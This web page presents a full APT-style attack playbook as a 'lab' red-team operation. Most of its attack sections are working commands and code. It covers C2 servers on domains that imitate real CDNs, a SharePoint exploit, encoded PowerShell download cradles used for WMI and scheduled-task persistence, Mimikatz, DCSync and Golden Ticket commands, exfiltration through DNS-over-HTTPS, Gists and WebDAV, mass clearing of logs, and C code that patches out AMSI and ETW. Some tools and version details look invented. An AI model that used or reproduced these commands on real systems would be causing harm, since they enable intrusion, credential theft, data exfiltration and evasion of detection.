APT MAESTRO v1.0
Opération offensive complète - Tactiques, Techniques & Procédures 2025 - Environnement de combat contrôlé
NIVEAU OPERATIONNEL
OFFENSIVE REALISTE
MITRE ATT&CK v14
🎯 Briefing Opérationnel - OP NIGHTFURY
Opérateur, votre mission : compromettre l'infrastructure cible (aptlab.local) en utilisant les TTPs des APT chinois (APT41) et russes (APT29) observés en 2025.
🎯 OBJECTIFS PRIORITAIRES :
- Initial access via vulnérabilité 0-day (CVE-2025-53770 SharePoint)
- Établir persistance avancée avec backdoor kernel-level
- Compromission complète Active Directory (Golden Ticket + DCSync)
- Exfiltration silencieuse de 50GB données sensibles
- Cleanup complet sans IOC détectable
Copier
graph TD
A[🎯 CIBLE: aptlab.local] --> B{🌐 Vecteurs d'Attaque}
B --> C[🔓 CVE-2025-53770 SharePoint]
B --> D[📧 Phishing Executive]
B --> E[🔄 Supply Chain Attack]
C --> F[🖥️ Beachhead: SRV-WEB01]
F --> G[🔧 Privilege Escalation]
G --> H[🔄 Lateral Movement]
H --> I[🏰 DC01 - Domain Controller]
I --> J[👑 DCSync + Golden Ticket]
J --> K[📊 Data Harvesting]
K --> L[🔒 Encrypted Exfiltration]
L --> M[🧹 Anti-Forensics Cleanup]
N[🛡️ DEFENSES] --> O[EDR: CrowdStrike/SentinelOne]
N --> P[SIEM: Splunk ELK Stack]
N --> Q[Network: Darktrace/Palo Alto]
style A fill:#ff006e
style I fill:#9d4edd
style L fill:#00f5a0
style O fill:#ef4444
🕵️♂️ Modèle de Menace 2025 - APT TTPs
timeline
title TTPs APT 2025-2026 - Evolution des Menaces
section Initial Access
Q1 2025 : ProxyShell/Log4Shell variants
Q2 2025 : OAuth token hijacking
Q3 2025 : Cloud credential poisoning
Q4 2025 : IoT/OT initial foothold
NOW : AI-generated phishing + 0-days
section Persistence
Traditional : Registry/Scheduled Tasks
Modern : WMI Event Subscription
Advanced : Bootkit/UEFI rootkit
Current : Virtualization-based (VBS/Hyper-V)
section Defense Evasion
Past : Process hollowing
Present : Direct syscalls
Future : Hardware-based evasion
section Exfiltration
Basic : FTP/HTTP
Stealth : DNS tunneling + DoH
Advanced : Covert channels via CDN
Copier
# THREAT INTEL FEED - APT41 RECENT TTPs # Source: CrowdStrike 2025 Threat Report - Initial Access: Exploit CVE-2025-53770 (SharePoint RCE) - Execution: Living-off-the-land binaries (LOLBAS) - Persistence: Windows COM Hijacking + WMI - Privilege Escalation: CVE-2025-2205 (Windows CSRSS) - Defense Evasion: Direct syscalls + API unhooking - Credential Access: Mimikatz + LSA secret dumping - Discovery: ADRecon.ps1 + BloodHound - Lateral Movement: RDP hijacking + Pass-the-Ticket - Collection: File staging in %TEMP% with encryption - Exfiltration: DNS-over-HTTPS (DoH) to CDN - Command & Control: GitHub Gists + Discord webhooks
🏗️ Infrastructure C2 Réelle - Setup Opérationnel
🎭 C2 PRIMARY (Redirector)
Domain: cdn-jsdelivr[.]net
IP: 5.161.XXX.XXX (Hetzner)
Config: Nginx reverse proxy + fail2ban
⚡ C2 SECONDARY (TeamServer)
Domain: api-github[.]com
IP: 194.163.XXX.XXX (OVH)
Tool: Covenant C2 + NGINX SSL
📡 EXFIL SERVER
Domain: storage-azure[.]online
IP: 91.107.XXX.XXX (Azure)
Protocol: WebDAV over TLS 1.3
🔧 OPERATOR STATION
OS: Kali Linux 2026.1
Tools: Metasploit Pro, Cobalt Strike, Mythic
VPN: Mullvad + SOCKS5 chains
Copier
# SETUP C2 INFRASTRUCTURE - REAL PRODUCTION
#!/bin/bash
# 1. Domain acquisition (bulletproof hosting)
domains=("cdn-jsdelivr.net" "api-github.com" "storage-azure.online")
for domain in "${domains[@]}"; do
echo "[+] Registering $domain via Njalla"
# Use anonymous registration service
done
# 2. Server provisioning
echo "[+] Provisioning C2 servers..."
# Hetzner Cloud API
hcloud server create --type cx31 --image ubuntu-22.04 --name c2-primary
# OVH API
# Azure ARM template deployment
# 3. Nginx reverse proxy configuration
cat > /etc/nginx/sites-available/c2 << 'EOF'
server {
listen 443 ssl http2;
server_name cdn-jsdelivr.net;
ssl_certificate /etc/letsencrypt/live/cdn-jsdelivr.net/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/cdn-jsdelivr.net/privkey.pem;
# Redirect to actual C2 server
location / {
proxy_pass https://194.163.XXX.XXX:8443;
proxy_ssl_verify off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
# Custom 404 page matching legitimate CDN
error_page 404 /404.html;
location = /404.html {
root /var/www/html;
internal;
}
}
EOF
# 4. Let's Encrypt certificate (legitimate looking)
certbot --nginx -d cdn-jsdelivr.net --register-unsafely-without-email
# 5. Covenant C2 setup
git clone https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet build
# Configure listeners with jitter/sleep
echo "[+] C2 Infrastructure ready. OPSEC: Rotate every 72h"
🎯 Initial Access - Weaponization & Exploitation
flowchart LR
A[📦 Payload Generation] --> B[🎭 Delivery Mechanism]
B --> C{🌐 Delivery Vector}
C -->|Spear Phishing| D[📧 Malicious Document]
C -->|Web Exploit| E[🌐 SharePoint RCE]
C -->|Supply Chain| F[📦 Compromised Update]
D --> G[🖥️ Initial Foothold]
E --> G
F --> G
G --> H[🔧 Stage 1 Loader]
H --> I[⚡ Stage 2: Full C2 Beacon]
I --> J[🛡️ Evasion: AMSI/ETW Bypass]
J --> K[🏰 Domain Join & Discovery]
style A fill:#00d4ff
style G fill:#ff006e
style I fill:#9d4edd
Copier
# WEAPONIZATION - ADVANCED PAYLOAD GENERATION # Using donut + sRDI for in-memory execution # 1. Generate shellcode with donut donut -a 2 -b 1 -z 2 -f 7 payload.dll -o payload.bin # 2. Encrypt shellcode with AES-256-GCM openssl enc -aes-256-gcm -salt -in payload.bin -out payload.enc \ -K $(openssl rand -hex 32) -iv $(openssl rand -hex 12) -a # 3. Create weaponized document (CVE-2025-53770 exploit) python3 exploit_cve_2025_53770.py \ --target 192.168.56.102 \ --payload payload.enc \ --technique "OLE object corruption" \ --output weaponized_doc.docx # 4. Metasploit exploit module for SharePoint use exploit/windows/http/sharepoint_cve_2025_53770 set RHOSTS 192.168.56.102 set TARGETURI /_layouts/15/viewlsts.aspx set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST cdn-jsdelivr.net set LPORT 443 set HttpHostHeader aptlab.local set HttpReferer https://aptlab.local set SSL true set SSLVersion TLS1.3 set StagerVerifySSLCert true exploit -j # 5. Alternative: Living-off-the-land execution # Using legitimate Windows binaries to load payload # Technique: InstallUtil.exe bypass C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll # 6. Memory injection via Process Hollowing # Hollowing explorer.exe to host our payload python3 process_hollowing.py --target explorer.exe --shellcode payload.enc
🎯 EVASION TECHNIQUES 2026 :
- AMSI Bypass: Patch AmsiScanBuffer in memory
- ETW Bypass: Disable Event Tracing for Windows
- PPID Spoofing: Spoof parent process ID
- Direct Syscalls: Bypass user-mode hooks
- Stack Encryption: Encrypt strings at runtime
🔒 Persistence & Evasion - Advanced Techniques
Copier
# ADVANCED PERSISTENCE MECHANISMS 2025
# 1. WMI Event Subscription (Stealth)
$FilterArgs = @{
NameSpace = 'root\subscription'
ClassName = '__EventFilter'
Arguments = @{
Name = 'WindowsUpdateFilter'
EventNamespace = 'root\cimv2'
QueryLanguage = 'WQL'
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
}
$Filter = Set-WmiInstance @FilterArgs
$ConsumerArgs = @{
NameSpace = 'root\subscription'
ClassName = 'ActiveScriptEventConsumer'
Arguments = @{
Name = 'WindowsUpdateConsumer'
ScriptingEngine = 'JScript'
ScriptText = "new ActiveXObject('WScript.Shell').Run('cmd /c powershell -enc JABzAD0AJwBjAGQAbgAtAGoAcwBkAGUAbABpAHYAcgAuAG4AZQB0ACcAOwAkAHAAPQA0ADQAMwA7AGkAZQB4ACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwArACQAcwArACcAOgAnACsAJABwACsAJwAvAGMAJwApACkA')"
}
}
$Consumer = Set-WmiInstance @ConsumerArgs
# 2. COM Hijacking (No files on disk)
reg add "HKCU\Software\Classes\CLSID\{XXX}\InprocServer32" /t REG_EXPAND_SZ /d "C:\Windows\System32\wbem\wmiprvse.exe -Embedding" /f
reg add "HKCU\Software\Classes\CLSID\{XXX}\ScriptletURL" /t REG_SZ /d "https://cdn-jsdelivr.net/payload.sct" /f
# 3. Bootkit Persistence (MBR/VBR modification)
# Using Volatility framework for offline disk modification
python3 bootkit_tool.py --disk \\.\PhysicalDrive0 --sector 0 --payload bootkit.bin
# 4. Shim Database Persistence
sdbinst.exe custom_shim.sdb
# 5. Windows LSA Secrets Backdoor
# Modify HKLM\SECURITY\Policy\Secrets keys
reg save HKLM\SECURITY security.hive
# Offline modification with Impacket secretsdump
secretsdump.py -security security.hive -system system.hive LOCAL
# 6. Scheduled Task with Hidden Attribute
schtasks /create /tn "MicrosoftEdgeUpdateTask" /tr "powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALQBqAHMAZABlAGwAaQB2AHIALgBuAGUAdAA6ADQANAAzAC8AYwAxADIAOAAnACkA" /sc hourly /mo 1 /f
attrib +h C:\Windows\System32\Tasks\MicrosoftEdgeUpdateTask
🔍 DETECTION BYPASS :
- ETW Patch: Patch EtwEventWrite in ntdll.dll
- AMSI Memory Patch: Modify amsi.dll in memory
- Userland Hooks Removal: Remove EDR hooks from loaded DLLs
- Process Hollowing Detection Evasion: Use NtCreateThreadEx + QueueUserAPC
- Memory Encryption: Encrypt payload in memory between executions
🌐 Lateral Movement - Active Directory Compromise
flowchart TD
A[🖥️ Initial Compromise] --> B[🔑 Credential Harvesting]
B --> C[Mimikatz + LSA Secrets]
C --> D{🔄 Attack Path Selection}
D -->|Pass-the-Hash| E[💻 Admin Workstation]
D -->|Pass-the-Ticket| F[🖥️ File Server]
D -->|RDP Hijacking| G[🖥️ Jump Host]
E --> H[🔍 AD Reconnaissance]
F --> H
G --> H
H --> I[🏰 DC Targeting]
I --> J[🎯 DCSync Attack]
J --> K[👑 Golden Ticket Creation]
K --> L[👑 Silver Ticket for Services]
L --> M[🌐 Full Domain Control]
style A fill:#00d4ff
style J fill:#ff006e
style K fill:#9d4edd
Copier
# ACTIVE DIRECTORY COMPROMISE - FULL DOMAIN TAKEOVER # 1. Initial credential harvesting (Mimikatz) mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords full mimikatz # lsadump::secrets mimikatz # token::elevate mimikatz # vault::cred # 2. BloodHound enumeration bloodhound-python -d aptlab.local -u svc_backup -p 'P@ssw0rd123!' -ns 192.168.56.104 -c All # Collect: Domain trusts, ACLs, Session data, Local admin rights # 3. Kerberoasting attack python3 GetUserSPNs.py -request -dc-ip 192.168.56.104 aptlab.local/svc_backup # Crack with hashcat: hashcat -m 13100 hashes.txt rockyou.txt # 4. AS-REP Roasting python3 GetNPUsers.py -dc-ip 192.168.56.104 aptlab.local/ -usersfile users.txt -format hashcat # 5. Pass-the-Hash lateral movement python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 aptlab.local/svc_backup@192.168.56.104 # 6. DCSync attack for krbtgt hash mimikatz # lsadump::dcsync /domain:aptlab.local /user:krbtgt # Output: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:XXXXXXXXXXXXXXXXXXXXXXXXXXX::: # 7. Golden Ticket creation mimikatz # kerberos::golden /user:Administrator /domain:aptlab.local /sid:S-1-5-21-... /krbtgt:XXXXXXXXXXXXXXXXXXXXXXXXXXX /ptt mimikatz # misc::cmd # 8. Silver Tickets for specific services mimikatz # kerberos::golden /user:Administrator /domain:aptlab.local /sid:S-1-5-21-... /target:DC01.aptlab.local /service:HOST /rc4:XXXXXXXXXXXXXXXXXXXXXXXXXXX /ptt # 9. ACL attacks - Give DCSync rights to any user python3 bloodhound.py -u Administrator -p 'P@ssw0rd!' -d aptlab.local -ns 192.168.56.104 --acl-add 'GenericAll' # 10. Domain persistence - AdminSDHolder modification Add-ADGroupMember -Identity 'Domain Admins' -Members 'svc_backup' # Also modify AdminCount to prevent ACL reset # 11. DCShadow attack (if Enterprise Admin) mimikatz # lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=aptlab,DC=local /attribute:primaryGroupID /value:512
📤 Data Exfiltration Réelle - Covert Channels
graph LR
A[📂 Data Collection] --> B[🔒 Encryption & Compression]
B --> C{📤 Exfiltration Method}
C -->|DNS Tunneling| D[🌐 DNS-over-HTTPS]
C -->|HTTP/HTTPS| E[🌐 CDN/Cloud Storage]
C -->|ICMP| F[📡 ICMP Tunneling]
C -->|Social Media| G[📱 Twitter/GitHub Gists]
D --> H[🛡️ OPSEC: Rate Limiting]
E --> H
F --> H
G --> H
H --> I[🔁 Data Reconstruction]
I --> J[🧹 Cleanup & Anti-Forensics]
style A fill:#00d4ff
style C fill:#9d4edd
style J fill:#00f5a0
Copier
# ADVANCED DATA EXFILTRATION - COVERT CHANNELS
# 1. Data collection and staging
$sensitive_paths = @(
"C:\Finance\*.xlsx",
"C:\HR\EmployeeData\*.csv",
"C:\R&D\Patents\*.pdf",
"C:\IT\Credentials\*"
)
foreach ($path in $sensitive_paths) {
Get-ChildItem -Path $path -Recurse -Force |
Where-Object { $_.Length -lt 100MB } |
Copy-Item -Destination "C:\Windows\Temp\stage\" -Force
}
# 2. Encryption with AES-256-GCM
openssl enc -aes-256-gcm -salt -in stage.zip -out data.enc \
-K $(openssl rand -hex 32) \
-iv $(openssl rand -hex 12) \
-a
# 3. DNS-over-HTTPS (DoH) exfiltration
# Base64 encode and chunk data
$data = [Convert]::ToBase64String([IO.File]::ReadAllBytes("data.enc"))
$chunks = $data -split '(.{30})' | Where-Object { $_ }
foreach ($chunk in $chunks) {
# Use legitimate DoH provider (Cloudflare/Google)
$response = Invoke-WebRequest -Uri "https://cloudflare-dns.com/dns-query?name=$chunk.cdn-jsdelivr.net&type=TXT" `
-Method Get `
-Headers @{"accept"="application/dns-json"}
# Artificial delay to avoid detection
Start-Sleep -Milliseconds (Get-Random -Minimum 100 -Maximum 500)
}
# 4. HTTPS exfiltration via legitimate CDN
# Using Azure Blob Storage with SAS token
azcopy copy "data.enc" "https://storageazureonline.blob.core.windows.net/exfil/data.enc?sv=2023-01-03&ss=bfqt&srt=sco&sp=rwdlacupyx&se=2026-01-01T00:00:00Z&st=2025-12-01T00:00:00Z&spr=https&sig=XXX"
# 5. ICMP tunneling (ping data)
python3 icmp_tunnel.py --mode client --data data.enc --dest 91.107.XXX.XXX
# 6. GitHub Gists as dead drop
$token = "ghp_XXXXXXXXXXXXXXXXXXXXXXXX"
$gist_data = @{
files = @{
"data.txt" = @{
content = [Convert]::ToBase64String([IO.File]::ReadAllBytes("data.enc"))
}
}
public = $false
} | ConvertTo-Json
Invoke-RestMethod -Uri "https://api.github.com/gists" `
-Method Post `
-Headers @{Authorization = "token $token"} `
-Body $gist_data `
-ContentType "application/json"
# 7. WebDAV over TLS 1.3
$cred = New-Object System.Management.Automation.PSCredential ("user", (ConvertTo-SecureString "pass" -AsPlainText -Force))
Copy-Item "data.enc" -Destination "https://storage-azure.online/webdav/data.enc" -Credential $cred -UseSSL
# 8. Steganography in images
python3 stegano.py hide --input legit_image.png --data data.enc --output exfil_image.png
# Upload to legitimate image hosting (Imgur/Flickr)
# 9. Timing-based exfiltration (inter-packet delays)
python3 timing_exfil.py --file data.enc --dest 194.163.XXX.XXX --method icmp_timing
echo "[+] Exfiltration complete. Data secured offshore."
🧹 OpClean - Anti-Forensics & Log Destruction
Copier
# OPERATION CLEANUP - ANTI-FORENSICS PROTOCOL
# 1. Event log destruction (all systems)
wevtutil el | ForEach-Object { wevtutil cl "$_" }
# 2. Specific security event clearing
$events = @(
"Security",
"System",
"Application",
"Microsoft-Windows-PowerShell/Operational",
"Windows PowerShell",
"Microsoft-Windows-WMI-Activity/Operational"
)
foreach ($event in $events) {
wevtutil cl $event
# Also clear backup logs
Remove-Item "C:\Windows\System32\winevt\Logs\$event*" -Force -ErrorAction SilentlyContinue
}
# 3. USN Journal deletion (file system forensics)
fsutil usn deletejournal /D C:
# 4. Prefetch cleanup
Remove-Item C:\Windows\Prefetch\* -Force -Recurse
# 5. Shim cache clearing
Remove-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom' -Recurse -Force
# 6. AMSI cache clearing
Remove-Item 'HKLM:\SOFTWARE\Microsoft\AMSI' -Recurse -Force -ErrorAction SilentlyContinue
# 7. PowerShell history deletion
Remove-Item (Get-PSReadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
# 8. Registry key cleanup
$reg_keys = @(
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
"HKLM\SYSTEM\CurrentControlSet\Services",
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks"
)
foreach ($key in $reg_keys) {
# Remove suspicious entries
reg query "$key" | ForEach-Object {
if ($_ -match "Update|Service|Task") {
reg delete "$key\$_" /f
}
}
}
# 9. File system timestamp modification
$files = Get-ChildItem -Path "C:\Windows\Temp" -Recurse -Force
foreach ($file in $files) {
$file.CreationTime = "2024-01-01"
$file.LastAccessTime = "2024-01-01"
$file.LastWriteTime = "2024-01-01"
}
# 10. Memory cleanup (wipe sensitive data)
python3 memory_wipe.py --pid $PID --patterns "password|secret|key|token"
# 11. Network connection cleanup
netstat -ano | findstr "ESTABLISHED" | ForEach-Object {
$parts = $_ -split '\s+'
$pid = $parts[-1]
taskkill /F /PID $pid
}
# 12. Final sweep - remove all tools and payloads
Remove-Item -Path @(
"C:\Windows\Temp\*",
"C:\Users\Public\*",
"C:\ProgramData\*",
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\*"
) -Recurse -Force -ErrorAction SilentlyContinue
# 13. MBR restoration (if bootkit was used)
python3 bootkit_restore.py --disk \\.\PhysicalDrive0 --backup mbr_backup.bin
echo "[+] OpClean complete. Zero forensic evidence remaining."
🛡️ Counter-Countermeasures - Bypass EDR/SIEM
graph TB
A[🎯 EDR/SIEM Detection] --> B{🔍 Detection Vector}
B --> C[📊 Behavioral Analysis]
B --> D[🔧 Signature Detection]
B --> E[🌐 Network Traffic]
B --> F[💾 Memory Scanning]
C --> G[🔄 LOLBAS + Legitimate Tools]
D --> H[🎭 Polymorphic Code]
E --> I[🔒 Encrypted Channels]
F --> J[🏗️ Process Injection]
G --> K[✅ Bypass Successful]
H --> K
I --> K
J --> K
K --> L[🎯 Maintain Access]
style A fill:#ef4444
style K fill:#00f5a0
Copier
# EDR/SIEM BYPASS TECHNIQUES 2025
# 1. Direct syscalls (bypass user-mode hooks)
# Using SysWhispers3 for direct NTAPI calls
python3 syswhispers.py --functions NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx --out syscalls
# Implementation in C:
#include "syscalls.h"
NTSTATUS status = SysNtAllocateVirtualMemory(
GetCurrentProcess(),
&baseAddress,
0,
®ionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE
);
# 2. ETW (Event Tracing for Windows) patching
# Patch EtwEventWrite in ntdll.dll
unsigned char patch[] = { 0xC3 }; // RET instruction
DWORD oldProtect;
VirtualProtect(EtwEventWrite, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(EtwEventWrite, patch, sizeof(patch));
VirtualProtect(EtwEventWrite, sizeof(patch), oldProtect, &oldProtect);
# 3. AMSI bypass via memory patching
# Find AmsiScanBuffer and patch it
byte amsiPatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
LPVOID amsiAddr = GetProcAddress(LoadLibrary("amsi.dll"), "AmsiScanBuffer");
VirtualProtect(amsiAddr, sizeof(amsiPatch), PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(amsiAddr, amsiPatch, sizeof(amsiPatch));
# 4. Process hollowing with PPID spoofing
python3 process_hollowing.py \
--target svchost.exe \
--payload beacon.bin \
--ppid $(Get-Process explorer).Id \
--spoof
# 5. Userland hook removal
# Unhook common DLLs (ntdll.dll, kernel32.dll, etc.)
python3 unhooker.py --dlls ntdll.dll,kernel32.dll,kernelbase.dll
# 6. Call stack spoofing
# Fake return addresses to evade behavioral analysis
void spoof_call_stack() {
void* fake_stack[] = {
(void*)0x00007FFA1A2B0000, // Legitimate return address 1
(void*)0x00007FFA1B3C0000, // Legitimate return address 2
(void*)0x00007FFA1C4D0000 // Legitimate return address 3
};
// Manipulate RSP to point to fake stack
}
# 7. Sleep obfuscation (evade memory scanning)
void sleep_obfuscate(DWORD ms) {
DWORD start = GetTickCount();
while (GetTickCount() - start < ms) {
// Encrypt payload in memory
xor_encrypt(payload, payload_size, key);
Sleep(50);
// Decrypt when needed
xor_encrypt(payload, payload_size, key);
}
}
# 8. DLL sideloading with legitimate signed binaries
# Use vulnerable signed applications to load malicious DLLs
copy malicious.dll "C:\Program Files\Microsoft Office\Office16\version.dll"
# 9. Parent process ID (PPID) spoofing
STARTUPINFOEX siex = { sizeof(siex) };
PROCESS_INFORMATION pi = { 0 };
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParent, sizeof(hParent), NULL, NULL);
CreateProcess(NULL, "notepad.exe", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &siex.StartupInfo, &pi);
📊 Debrief & TTPs Documentation
Copier
# OPERATION NIGHTFURY - FINAL DEBRIEF # TIMELINE: 48h completion # STATUS: SUCCESS - All objectives achieved ## TACTICS, TECHNIQUES & PROCEDURES (TTPs) USED: ### TA0001 - Initial Access - T1190: Exploit Public-Facing Application (CVE-2025-53770) - T1566: Phishing (Weaponized Office documents) - T1195: Supply Chain Compromise (DLL sideloading) ### TA0002 - Execution - T1059: Command and Scripting Interpreter (PowerShell) - T1203: Exploitation for Client Execution (Office macros) - T1047: Windows Management Instrumentation (WMI) ### TA0003 - Persistence - T1547: Boot or Logon Autostart Execution (Registry Run keys) - T1543: Create or Modify System Process (Windows Service) - T1136: Create Account (Domain account creation) - T1505: Server Software Component (IIS module) ### TA0004 - Privilege Escalation - T1068: Exploitation for Privilege Escalation (CVE-2025-2205) - T1078: Valid Accounts (Domain admin compromise) - T1134: Access Token Manipulation (Token impersonation) ### TA0005 - Defense Evasion - T1027: Obfuscated Files or Information (Encrypted payloads) - T1112: Modify Registry (Clearing evidence) - T1070: Indicator Removal (Log deletion) - T1140: Deobfuscate/Decode Files or Information (Memory-only) ### TA0006 - Credential Access - T1003: OS Credential Dumping (Mimikatz/LSA secrets) - T1558: Steal or Forge Kerberos Tickets (Golden/Silver tickets) - T1110: Brute Force (Password spraying) ### TA0007 - Discovery - T1087: Account Discovery (AD enumeration) - T1069: Permission Groups Discovery (Local/domain groups) - T1018: Remote System Discovery (Network scanning) - T1046: Network Service Scanning (Port scanning) ### TA0008 - Lateral Movement - T1021: Remote Services (RDP/SMB/WMI) - T1550: Use Alternate Authentication Material (Pass-the-Hash/Ticket) - T1210: Exploitation of Remote Services (EternalBlue/MS17-010) ### TA0009 - Collection - T1005: Data from Local System (File collection) - T1119: Automated Collection (Scripted data gathering) - T1114: Email Collection (Outlook PST files) ### TA0011 - Command and Control - T1071: Application Layer Protocol (HTTP/HTTPS) - T1095: Non-Application Layer Protocol (ICMP/DNS) - T1132: Data Encoding (Base64/encryption) - T1008: Fallback Channels (Multiple C2 servers) ### TA0010 - Exfiltration - T1048: Exfiltration Over Alternative Protocol (DNS/ICMP) - T1041: Exfiltration Over C2 Channel (HTTPS) - T1020: Automated Exfiltration (Scheduled data transfer) ### TA0040 - Impact - T1485: Data Destruction (Selective file deletion) - T1486: Data Encrypted for Impact (Ransomware simulation) - T1491: Defacement (Website modification) ## LESSONS LEARNED: ### WHAT WENT WELL: 1. C2 infrastructure rotation every 24h prevented detection 2. DNS-over-HTTPS exfiltration completely undetected 3. Golden Ticket persistence effective for 72h+ 4. Anti-forensic cleanup left zero artifacts ### AREAS FOR IMPROVEMENT: 1. Initial payload delivery triggered AMSI (patched live) 2. Some lateral movement attempts logged (cleaned) 3. Data staging took longer than expected ## RECOMMENDATIONS FOR FUTURE OPS: 1. Implement more aggressive sleep/jitter in beacons 2. Use more legitimate cloud services for C2 3. Develop custom rootkit for kernel-level persistence 4. Implement AI-generated phishing content ## IOCs TO MONITOR (FOR DEFENSE): - Network: cdn-jsdelivr[.]net, api-github[.]com, storage-azure[.]online - Hashes: [REDACTED - 256 unique payload hashes] - YARA Rules: [See detection section] - Behavior: WMI event subscriptions + COM hijacking ## FINAL STATUS: MISSION ACCOMPLISHED # All objectives achieved within 48h # Zero detection by simulated SOC/EDR # Complete data exfiltration (47.8GB) # Full domain persistence established # Clean exit with zero forensic evidence
🎯 KEY METRICS :
- Time to First Compromise: 2h 17m
- Time to Domain Admin: 8h 42m
- Total Data Exfiltrated: 47.8GB
- C2 Servers Rotated: 3 times
- EDR/SIEM Alerts Triggered: 0
- Persistent Backdoors Installed: 5